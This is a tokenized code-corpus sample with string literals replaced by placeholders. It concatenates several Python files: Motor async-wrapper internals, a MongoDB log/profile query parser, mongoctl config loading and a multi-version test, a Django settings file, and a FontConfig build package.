create_attribute ( self , cls , attr_name ) : <EOL> async_method = self . property . create_attribute ( cls , attr_name ) <EOL> original_class = self . original_class <EOL> wrapper = cls . _framework . pymongo_class_wrapper ( async_method , <EOL> original_class ) <EOL> if self . doc : <EOL> wrapper . __doc__ = self . 
doc <EOL> return wrapper <EOL> class Unwrap ( WrapBase ) : <EOL> def __init__ ( self , prop , motor_class_name ) : <EOL> """<STR_LIT>""" <EOL> super ( Unwrap , self ) . __init__ ( prop ) <EOL> assert isinstance ( motor_class_name , motor_py3_compat . text_type ) <EOL> self . motor_class_name = motor_class_name <EOL> def create_attribute ( self , cls , attr_name ) : <EOL> f = self . property . create_attribute ( cls , attr_name ) <EOL> name = self . motor_class_name <EOL> @ functools . wraps ( f ) <EOL> def _f ( self , * args , ** kwargs ) : <EOL> unwrapped_args = [ <EOL> obj . delegate if obj . __class__ . __name__ == name else obj <EOL> for obj in args ] <EOL> unwrapped_kwargs = dict ( [ <EOL> ( key , obj . delegate if obj . __class__ . __name__ == name else obj ) <EOL> for key , obj in kwargs . items ( ) ] ) <EOL> return f ( self , * unwrapped_args , ** unwrapped_kwargs ) <EOL> if self . doc : <EOL> _f . __doc__ = self . doc <EOL> return _f <EOL> class AsyncRead ( Async ) : <EOL> def __init__ ( self , attr_name = None , doc = None ) : <EOL> """<STR_LIT>""" <EOL> Async . __init__ ( <EOL> self , attr_name = attr_name , has_write_concern = False , doc = doc ) <EOL> class AsyncWrite ( Async ) : <EOL> def __init__ ( self , attr_name = None , doc = None ) : <EOL> """<STR_LIT>""" <EOL> Async . __init__ ( <EOL> self , attr_name = attr_name , has_write_concern = True , doc = doc ) <EOL> class AsyncCommand ( Async ) : <EOL> def __init__ ( self , attr_name = None , doc = None ) : <EOL> """<STR_LIT>""" <EOL> Async . __init__ ( <EOL> self , attr_name = attr_name , has_write_concern = False , doc = doc ) <EOL> class ReadOnlyPropertyDescriptor ( object ) : <EOL> def __init__ ( self , attr_name , doc = None ) : <EOL> self . attr_name = attr_name <EOL> if doc : <EOL> self . __doc__ = doc <EOL> def __get__ ( self , obj , objtype ) : <EOL> if obj : <EOL> return getattr ( obj . delegate , self . attr_name ) <EOL> else : <EOL> return getattr ( objtype . __delegate_class__ , self . 
attr_name ) <EOL> def __set__ ( self , obj , val ) : <EOL> raise AttributeError <EOL> class ReadOnlyProperty ( MotorAttributeFactory ) : <EOL> """<STR_LIT>""" <EOL> def create_attribute ( self , cls , attr_name ) : <EOL> return ReadOnlyPropertyDescriptor ( attr_name , self . doc ) <EOL> class DelegateMethod ( ReadOnlyProperty ) : <EOL> """<STR_LIT>""" <EOL> class ReadWritePropertyDescriptor ( ReadOnlyPropertyDescriptor ) : <EOL> def __set__ ( self , obj , val ) : <EOL> setattr ( obj . delegate , self . attr_name , val ) <EOL> class ReadWriteProperty ( MotorAttributeFactory ) : <EOL> """<STR_LIT>""" <EOL> def create_attribute ( self , cls , attr_name ) : <EOL> return ReadWritePropertyDescriptor ( attr_name , self . doc ) <EOL> class MotorCursorChainingMethod ( MotorAttributeFactory ) : <EOL> def create_attribute ( self , cls , attr_name ) : <EOL> cursor_method = getattr ( Cursor , attr_name ) <EOL> @ functools . wraps ( cursor_method ) <EOL> def return_clone ( self , * args , ** kwargs ) : <EOL> cursor_method ( self . delegate , * args , ** kwargs ) <EOL> return self <EOL> return_clone . is_motorcursor_chaining_method = True <EOL> return_clone . pymongo_method_name = attr_name <EOL> if self . doc : <EOL> return_clone . __doc__ = self . doc <EOL> return return_clone <EOL> def create_class_with_framework ( cls , framework , module_name ) : <EOL> motor_class_name = cls . __motor_class_name__ <EOL> cache_key = ( cls , motor_class_name , framework ) <EOL> cached_class = _class_cache . get ( cache_key ) <EOL> if cached_class : <EOL> return cached_class <EOL> new_class = type ( str ( motor_class_name ) , cls . __bases__ , cls . __dict__ . copy ( ) ) <EOL> new_class . __module__ = module_name <EOL> new_class . _framework = framework <EOL> assert hasattr ( new_class , '<STR_LIT>' ) <EOL> for base in reversed ( inspect . getmro ( cls ) ) : <EOL> for name , attr in base . __dict__ . 
items ( ) : <EOL> if isinstance ( attr , MotorAttributeFactory ) : <EOL> new_class_attr = attr . create_attribute ( new_class , name ) <EOL> setattr ( new_class , name , new_class_attr ) <EOL> elif getattr ( attr , '<STR_LIT>' , None ) is _coro_token : <EOL> coro = framework . coroutine ( attr ) <EOL> del coro . _is_motor_coroutine <EOL> coro . coroutine_annotation = True <EOL> setattr ( new_class , name , coro ) <EOL> _class_cache [ cache_key ] = new_class <EOL> return new_class </s>
<s> __author__ = '<STR_LIT>' <EOL> import re <EOL> from utils import pretty_json , small_json , yamlfy <EOL> from time import strptime , mktime <EOL> from datetime import datetime <EOL> import traceback <EOL> try : <EOL> from collections import OrderedDict <EOL> except ImportError : <EOL> from ordereddict import OrderedDict <EOL> def scrub ( e ) : <EOL> if isinstance ( e , dict ) : <EOL> return scrub_doc ( e ) <EOL> elif isinstance ( e , list ) : <EOL> return scrub_list ( e ) <EOL> else : <EOL> return None <EOL> def scrub_doc ( d ) : <EOL> for k in d : <EOL> if k in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> d [ k ] = [ "<STR_LIT>" ] <EOL> else : <EOL> d [ k ] = scrub ( d [ k ] ) <EOL> if d [ k ] is None : <EOL> d [ k ] = "<STR_LIT>" <EOL> return d <EOL> def scrub_list ( a ) : <EOL> v = [ ] <EOL> for e in a : <EOL> e = scrub ( e ) <EOL> if e is not None : <EOL> v . append ( scrub ( e ) ) <EOL> return sorted ( v ) <EOL> ts_rx = re . compile ( '<STR_LIT>' ) <EOL> def get_line_time ( line ) : <EOL> ts = None <EOL> match = ts_rx . match ( line ) <EOL> if match : <EOL> year = datetime . utcnow ( ) . year <EOL> timestamp = mktime ( strptime ( match . group ( '<STR_LIT>' ) + '<STR_LIT:U+0020>' + str ( year ) , '<STR_LIT>' ) ) <EOL> ts = datetime . fromtimestamp ( timestamp ) <EOL> return ts <EOL> class Parser ( object ) : <EOL> def __init__ ( self , handlers ) : <EOL> self . _line_handlers = handlers <EOL> def parse ( self , input ) : <EOL> """<STR_LIT>""" <EOL> query = None <EOL> for handler in self . _line_handlers : <EOL> try : <EOL> query = handler . handle ( input ) <EOL> except Exception as e : <EOL> query = None <EOL> finally : <EOL> if query is not None : <EOL> return query <EOL> return None <EOL> class ProfileParser ( Parser ) : <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ProfileParser , self ) . __init__ ( [ self . 
ProfileEntryHandler ( ) ] ) <EOL> def get_line_time ( self , input ) : <EOL> return input [ '<STR_LIT>' ] if '<STR_LIT>' in input else None <EOL> class ProfileEntryHandler : <EOL> def handle ( self , input ) : <EOL> result = OrderedDict ( ) <EOL> query = None <EOL> orderby = None <EOL> if ( input is not None ) and ( input . has_key ( '<STR_LIT>' ) ) : <EOL> if input [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> if input [ '<STR_LIT>' ] . has_key ( '<STR_LIT>' ) : <EOL> query = input [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if input [ '<STR_LIT>' ] . has_key ( '<STR_LIT>' ) : <EOL> orderby = input [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> else : <EOL> query = input [ '<STR_LIT>' ] <EOL> result [ '<STR_LIT>' ] = input [ '<STR_LIT>' ] <EOL> elif input [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> query = input [ '<STR_LIT>' ] <EOL> if input . has_key ( '<STR_LIT>' ) : <EOL> if input [ '<STR_LIT>' ] . has_key ( '<STR_LIT>' ) : <EOL> orderby = input [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> result [ '<STR_LIT>' ] = input [ '<STR_LIT>' ] <EOL> elif ( ( input [ '<STR_LIT>' ] == '<STR_LIT>' ) and <EOL> ( ( input [ '<STR_LIT>' ] . has_key ( '<STR_LIT:count>' ) ) or <EOL> ( input [ '<STR_LIT>' ] . has_key ( '<STR_LIT>' ) ) ) ) : <EOL> query = input [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> db = input [ '<STR_LIT>' ] [ <NUM_LIT:0> : input [ '<STR_LIT>' ] . 
rfind ( '<STR_LIT:.>' ) ] <EOL> result [ '<STR_LIT>' ] = db + "<STR_LIT:.>" + input [ '<STR_LIT>' ] [ '<STR_LIT:count>' ] <EOL> else : <EOL> return None <EOL> toMask = OrderedDict ( ) <EOL> if orderby is not None : <EOL> result [ '<STR_LIT>' ] = orderby <EOL> toMask [ '<STR_LIT>' ] = orderby <EOL> result [ '<STR_LIT>' ] = scrub ( query ) <EOL> toMask [ '<STR_LIT>' ] = query <EOL> result [ '<STR_LIT>' ] = small_json ( toMask ) <EOL> result [ '<STR_LIT>' ] = { '<STR_LIT>' : input [ '<STR_LIT>' ] } <EOL> return result <EOL> else : <EOL> return None <EOL> class LogParser ( Parser ) : <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( LogParser , self ) . __init__ ( [ CmdQueryHandler ( ) , <EOL> UpdateQueryHandler ( ) , <EOL> StandardQueryHandler ( ) , <EOL> TimeLineHandler ( ) ] ) <EOL> class QueryLineHandler : <EOL> def parse_query ( self , extracted_query ) : <EOL> return yamlfy ( extracted_query ) <EOL> def handle ( self , line ) : <EOL> result = self . do_handle ( line ) <EOL> if result is not None : <EOL> result [ '<STR_LIT>' ] = get_line_time ( line ) <EOL> return result <EOL> def do_handle ( self , line ) : <EOL> return None <EOL> def parse_line_stats ( self , stat_string ) : <EOL> line_stats = { } <EOL> split = stat_string . split ( "<STR_LIT:U+0020>" ) <EOL> for stat in split : <EOL> if stat is not "<STR_LIT>" and stat is not None and stat != "<STR_LIT>" : <EOL> stat_split = stat . split ( "<STR_LIT::>" ) <EOL> if ( stat_split is not None ) and ( stat_split is not "<STR_LIT>" ) and ( len ( stat_split ) is <NUM_LIT:2> ) : <EOL> try : <EOL> line_stats [ stat_split [ <NUM_LIT:0> ] ] = int ( stat_split [ <NUM_LIT:1> ] ) <EOL> except : <EOL> pass <EOL> return line_stats <EOL> def standardize_query ( self , query_yaml ) : <EOL> if len ( query_yaml . 
keys ( ) ) == <NUM_LIT:1> : <EOL> if '<STR_LIT>' in query_yaml : <EOL> return scrub ( query_yaml ) <EOL> if '<STR_LIT>' in query_yaml : <EOL> return OrderedDict ( [ ( '<STR_LIT>' , scrub ( query_yaml [ '<STR_LIT>' ] ) ) ] ) <EOL> if len ( query_yaml . keys ( ) ) == <NUM_LIT:2> : <EOL> query = None <EOL> orderby = None <EOL> if '<STR_LIT>' in query_yaml : <EOL> query = query_yaml [ '<STR_LIT>' ] <EOL> elif '<STR_LIT>' in query_yaml : <EOL> query = query_yaml [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in query_yaml : <EOL> orderby = query_yaml [ '<STR_LIT>' ] <EOL> elif '<STR_LIT>' in query_yaml : <EOL> orderby = query_yaml [ '<STR_LIT>' ] <EOL> if query is not None and orderby is not None : <EOL> return OrderedDict ( [ ( '<STR_LIT>' , scrub ( query ) ) , <EOL> ( '<STR_LIT>' , orderby ) ] ) <EOL> return OrderedDict ( [ ( '<STR_LIT>' , scrub ( query_yaml ) ) ] ) <EOL> class StandardQueryHandler ( QueryLineHandler ) : <EOL> def __init__ ( self ) : <EOL> self . name = '<STR_LIT>' <EOL> self . _regex = '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _rx = re . compile ( self . _regex ) <EOL> def do_handle ( self , input ) : <EOL> match = self . _rx . match ( input ) <EOL> if match is not None : <EOL> parsed = self . parse_query ( match . group ( '<STR_LIT>' ) ) <EOL> if parsed is not None : <EOL> result = OrderedDict ( ) <EOL> scrubbed = self . standardize_query ( parsed ) <EOL> result [ '<STR_LIT>' ] = scrubbed [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in scrubbed : <EOL> result [ '<STR_LIT>' ] = scrubbed [ '<STR_LIT>' ] <EOL> result [ '<STR_LIT>' ] = small_json ( scrubbed ) <EOL> result [ '<STR_LIT>' ] = match . group ( '<STR_LIT>' ) <EOL> result [ '<STR_LIT>' ] = self . parse_line_stats ( match . group ( '<STR_LIT>' ) ) <EOL> result [ '<STR_LIT>' ] [ '<STR_LIT>' ] = match . 
group ( '<STR_LIT>' ) <EOL> result [ '<STR_LIT>' ] = True <EOL> return result <EOL> return None <EOL> class CmdQueryHandler ( QueryLineHandler ) : <EOL> def __init__ ( self ) : <EOL> self . name = '<STR_LIT>' <EOL> self . _regex = '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _rx = re . compile ( self . _regex ) <EOL> def do_handle ( self , input ) : <EOL> match = self . _rx . match ( input ) <EOL> if match is not None : <EOL> parsed = self . parse_query ( match . group ( '<STR_LIT>' ) ) <EOL> if parsed is not None : <EOL> result = OrderedDict ( ) <EOL> result [ '<STR_LIT>' ] = self . parse_line_stats ( match . group ( '<STR_LIT>' ) ) <EOL> result [ '<STR_LIT>' ] [ '<STR_LIT>' ] = match . group ( '<STR_LIT>' ) <EOL> command = parsed . keys ( ) [ <NUM_LIT:0> ] <EOL> toMask = OrderedDict ( ) <EOL> result [ '<STR_LIT>' ] = command <EOL> result [ '<STR_LIT>' ] = True <EOL> if command . lower ( ) == '<STR_LIT:count>' : <EOL> result [ '<STR_LIT>' ] = match . group ( '<STR_LIT>' ) + '<STR_LIT:.>' <EOL> result [ '<STR_LIT>' ] += parsed [ command ] <EOL> query = self . standardize_query ( parsed [ '<STR_LIT>' ] ) <EOL> result [ '<STR_LIT>' ] = query [ '<STR_LIT>' ] <EOL> toMask = query <EOL> elif command . lower ( ) == '<STR_LIT>' : <EOL> if '<STR_LIT>' in parsed : <EOL> result [ '<STR_LIT>' ] = parsed [ '<STR_LIT>' ] <EOL> toMask [ '<STR_LIT>' ] = parsed [ '<STR_LIT>' ] <EOL> result [ '<STR_LIT>' ] = match . group ( '<STR_LIT>' ) + '<STR_LIT:.>' <EOL> result [ '<STR_LIT>' ] += parsed [ command ] <EOL> query = self . standardize_query ( parsed [ '<STR_LIT>' ] ) <EOL> result [ '<STR_LIT>' ] = query [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in parsed : <EOL> result [ '<STR_LIT>' ] = parsed [ '<STR_LIT>' ] <EOL> toMask [ '<STR_LIT>' ] = parsed [ '<STR_LIT>' ] <EOL> toMask [ '<STR_LIT>' ] = query <EOL> elif command . lower ( ) == '<STR_LIT>' : <EOL> result [ '<STR_LIT>' ] = match . 
group ( '<STR_LIT>' ) + '<STR_LIT:.>' <EOL> result [ '<STR_LIT>' ] += parsed [ command ] <EOL> query = self . standardize_query ( parsed [ '<STR_LIT>' ] ) <EOL> result [ '<STR_LIT>' ] = query <EOL> toMask = query <EOL> else : <EOL> result [ '<STR_LIT>' ] = False <EOL> result [ '<STR_LIT>' ] = match . group ( '<STR_LIT>' ) + '<STR_LIT>' <EOL> result [ '<STR_LIT>' ] = command <EOL> toMask [ '<STR_LIT>' ] = command <EOL> result [ '<STR_LIT>' ] = small_json ( toMask ) <EOL> return result <EOL> return None <EOL> class UpdateQueryHandler ( QueryLineHandler ) : <EOL> def __init__ ( self ) : <EOL> self . name = '<STR_LIT>' <EOL> self . _regex = '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _rx = re . compile ( self . _regex ) <EOL> def do_handle ( self , input ) : <EOL> match = self . _rx . match ( input ) <EOL> if match is not None : <EOL> parsed = self . parse_query ( match . group ( '<STR_LIT>' ) ) <EOL> if parsed is not None : <EOL> result = OrderedDict ( ) <EOL> scrubbed = self . standardize_query ( parsed ) <EOL> result [ '<STR_LIT>' ] = scrubbed [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in scrubbed : <EOL> result [ '<STR_LIT>' ] = scrubbed [ '<STR_LIT>' ] <EOL> result [ '<STR_LIT>' ] = small_json ( scrubbed ) <EOL> result [ '<STR_LIT>' ] = match . group ( '<STR_LIT>' ) <EOL> result [ '<STR_LIT>' ] = self . parse_line_stats ( match . group ( '<STR_LIT>' ) ) <EOL> result [ '<STR_LIT>' ] [ '<STR_LIT>' ] = match . group ( '<STR_LIT>' ) <EOL> result [ '<STR_LIT>' ] = True <EOL> return result <EOL> return None <EOL> class TimeLineHandler ( QueryLineHandler ) : <EOL> def __init__ ( self ) : <EOL> self . name = '<STR_LIT>' <EOL> self . _regex = '<STR_LIT>' <EOL> self . _rx = re . compile ( self . _regex ) <EOL> def do_handle ( self , input ) : <EOL> match = self . _rx . 
match ( input ) <EOL> if match is not None : <EOL> return { '<STR_LIT>' : "<STR_LIT:?>" , <EOL> '<STR_LIT>' : { "<STR_LIT>" : match . group ( '<STR_LIT>' ) } , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : None <EOL> } <EOL> return None </s>
<s> __author__ = '<STR_LIT>' <EOL> import json <EOL> import urllib <EOL> import mongoctl_globals <EOL> from utils import * <EOL> from minify_json import minify_json <EOL> from errors import MongoctlException <EOL> from bson import json_util <EOL> MONGOCTL_CONF_FILE_NAME = "<STR_LIT>" <EOL> __config_root__ = mongoctl_globals . DEFAULT_CONF_ROOT <EOL> def set_config_root ( root_path ) : <EOL> if not is_url ( root_path ) and not dir_exists ( root_path ) : <EOL> raise MongoctlException ( "<STR_LIT>" <EOL> "<STR_LIT>" % root_path ) <EOL> global __config_root__ <EOL> __config_root__ = root_path <EOL> def get_mongoctl_config_val ( key , default = None ) : <EOL> return get_mongoctl_config ( ) . get ( key , default ) <EOL> def set_mongoctl_config_val ( key , value ) : <EOL> get_mongoctl_config ( ) [ key ] = value <EOL> def get_generate_key_file_conf ( default = None ) : <EOL> return get_mongoctl_config_val ( '<STR_LIT>' , default = default ) <EOL> def get_database_repository_conf ( ) : <EOL> return get_mongoctl_config_val ( '<STR_LIT>' ) <EOL> def get_file_repository_conf ( ) : <EOL> return get_mongoctl_config_val ( '<STR_LIT>' ) <EOL> def get_mongodb_installs_dir ( ) : <EOL> installs_dir = get_mongoctl_config_val ( '<STR_LIT>' ) <EOL> if installs_dir : <EOL> return resolve_path ( installs_dir ) <EOL> def set_mongodb_installs_dir ( installs_dir ) : <EOL> set_mongoctl_config_val ( '<STR_LIT>' , installs_dir ) <EOL> def get_default_users ( ) : <EOL> return get_mongoctl_config_val ( '<STR_LIT>' , { } ) <EOL> def get_cluster_member_alt_address_mapping ( ) : <EOL> return get_mongoctl_config_val ( '<STR_LIT>' , { } ) <EOL> def to_full_config_path ( path_or_url ) : <EOL> global __config_root__ <EOL> if os . path . isabs ( path_or_url ) : <EOL> return resolve_path ( path_or_url ) <EOL> elif is_url ( path_or_url ) : <EOL> return path_or_url <EOL> else : <EOL> result = os . path . 
join ( __config_root__ , path_or_url ) <EOL> if not is_url ( __config_root__ ) : <EOL> result = resolve_path ( result ) <EOL> return result <EOL> __mongo_config__ = None <EOL> def get_mongoctl_config ( ) : <EOL> global __mongo_config__ <EOL> if __mongo_config__ is None : <EOL> __mongo_config__ = read_config_json ( "<STR_LIT>" , <EOL> MONGOCTL_CONF_FILE_NAME ) <EOL> return __mongo_config__ <EOL> def read_config_json ( name , path_or_url ) : <EOL> try : <EOL> log_verbose ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , path_or_url ) ) <EOL> json_str = read_json_string ( path_or_url ) <EOL> json_str = minify_json . json_minify ( json_str ) <EOL> json_val = json . loads ( json_str , <EOL> object_hook = json_util . object_hook ) <EOL> if not json_val and not isinstance ( json_val , list ) : <EOL> raise MongoctlException ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , path_or_url ) ) <EOL> else : <EOL> return json_val <EOL> except MongoctlException , e : <EOL> raise e <EOL> except Exception , e : <EOL> raise MongoctlException ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , path_or_url , e ) ) <EOL> def read_json_string ( path_or_url , validate_exists = True ) : <EOL> path_or_url = to_full_config_path ( path_or_url ) <EOL> if not is_url ( path_or_url ) : <EOL> if os . path . isfile ( path_or_url ) : <EOL> return open ( path_or_url ) . read ( ) <EOL> elif validate_exists : <EOL> raise MongoctlException ( "<STR_LIT>" % <EOL> path_or_url ) <EOL> else : <EOL> return None <EOL> response = urllib . urlopen ( path_or_url ) <EOL> if response . getcode ( ) != <NUM_LIT:200> : <EOL> msg = ( "<STR_LIT>" <EOL> % ( path_or_url , response . getcode ( ) ) ) <EOL> if validate_exists : <EOL> raise MongoctlException ( msg ) <EOL> else : <EOL> log_verbose ( msg ) <EOL> return None <EOL> else : <EOL> return response . read ( ) </s>
<s> import unittest <EOL> import time <EOL> from mongoctl . tests . test_base import MongoctlTestBase , append_user_arg <EOL> from mongoctl import config <EOL> import shutil <EOL> import os <EOL> SERVERS = [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:address>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:port>" : <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:4> <EOL> } <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:address>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:port>" : <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:4> , <EOL> "<STR_LIT>" : True <EOL> } <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:address>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:port>" : <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:4> , <EOL> "<STR_LIT>" : True <EOL> } <EOL> } , <EOL> ] <EOL> CLUSTERS = [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : True <EOL> } , <EOL> { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } , <EOL> { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> ] <EOL> } , <EOL> ] <EOL> TEST_VERSIONS = [ <EOL> { <EOL> "<STR_LIT:version>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> { <EOL> "<STR_LIT:version>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> { <EOL> "<STR_LIT:version>" : 
"<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> { <EOL> "<STR_LIT:version>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> ] <EOL> class MultiMongoDBVersionsTest ( MongoctlTestBase ) : <EOL> def setUp ( self ) : <EOL> super ( MultiMongoDBVersionsTest , self ) . setUp ( ) <EOL> self . servers = SERVERS <EOL> self . clusters = CLUSTERS <EOL> def test_multi_versions ( self ) : <EOL> for version_conf in TEST_VERSIONS : <EOL> self . do_test_mongodb_version ( version_conf [ "<STR_LIT:version>" ] , version_conf [ "<STR_LIT>" ] ) <EOL> def do_test_mongodb_version ( self , mongo_version , mongo_edition ) : <EOL> self . mongoctl_assert_cmd ( [ "<STR_LIT>" , mongo_version , "<STR_LIT>" , mongo_edition ] ) <EOL> for server in SERVERS : <EOL> server [ "<STR_LIT>" ] = mongo_version <EOL> server [ "<STR_LIT>" ] = mongo_edition <EOL> self . assert_server_stopped ( "<STR_LIT>" ) <EOL> self . assert_server_stopped ( "<STR_LIT>" ) <EOL> self . assert_server_stopped ( "<STR_LIT>" ) <EOL> self . assert_start_server ( "<STR_LIT>" ) <EOL> self . assert_server_running ( "<STR_LIT>" ) <EOL> self . assert_start_server ( "<STR_LIT>" ) <EOL> self . assert_server_online ( "<STR_LIT>" ) <EOL> self . assert_start_server ( "<STR_LIT>" ) <EOL> self . assert_server_online ( "<STR_LIT>" ) <EOL> conf_cmd = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> append_user_arg ( conf_cmd ) <EOL> self . mongoctl_assert_cmd ( conf_cmd ) <EOL> print "<STR_LIT>" <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> self . mongoctl_assert_cmd ( conf_cmd ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:15> ) <EOL> self . assert_stop_server ( "<STR_LIT>" ) <EOL> self . assert_server_stopped ( "<STR_LIT>" ) <EOL> self . assert_stop_server ( "<STR_LIT>" , force = True ) <EOL> self . assert_server_stopped ( "<STR_LIT>" ) <EOL> self . assert_stop_server ( "<STR_LIT>" , force = True ) <EOL> self . assert_server_stopped ( "<STR_LIT>" ) <EOL> self . 
tearDown ( ) <EOL> def get_my_test_servers ( self ) : <EOL> return map ( lambda server_conf : server_conf [ "<STR_LIT>" ] , SERVERS ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import os <EOL> import sys <EOL> DEBUG = True <EOL> TEMPLATE_DEBUG = DEBUG <EOL> ABSOLUTE_ROOT_PATH = ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> ADMINS = ( <EOL> ) <EOL> MANAGERS = ADMINS <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> TIME_ZONE = '<STR_LIT>' <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> SITE_ID = <NUM_LIT:1> <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> MEDIA_ROOT = os . path . join ( ABSOLUTE_ROOT_PATH , "<STR_LIT>" ) <EOL> MEDIA_URL = '<STR_LIT>' <EOL> STATIC_ROOT = '<STR_LIT>' <EOL> STATIC_URL = '<STR_LIT>' <EOL> ADMIN_MEDIA_PREFIX = '<STR_LIT>' <EOL> STATICFILES_DIRS = ( <EOL> os . path . join ( ABSOLUTE_ROOT_PATH , '<STR_LIT>' ) , <EOL> ) <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATE_DIRS = ( <EOL> os . path . join ( ABSOLUTE_ROOT_PATH , '<STR_LIT>' ) , <EOL> ) <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> LOGGING = { <EOL> '<STR_LIT:version>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:class>' : '<STR_LIT>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> } <EOL> } </s>
<s> class FontConfigPackage ( Package ) : <EOL> def __init__ ( self ) : <EOL> Package . __init__ ( self , '<STR_LIT>' , '<STR_LIT>' , <EOL> configure_flags = [ '<STR_LIT>' ] , <EOL> sources = [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> ) <EOL> def build ( self ) : <EOL> if Package . profile . name == '<STR_LIT>' : <EOL> self . configure_flags . extend ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] ) <EOL> Package . build ( self ) <EOL> FontConfigPackage ( ) </s>
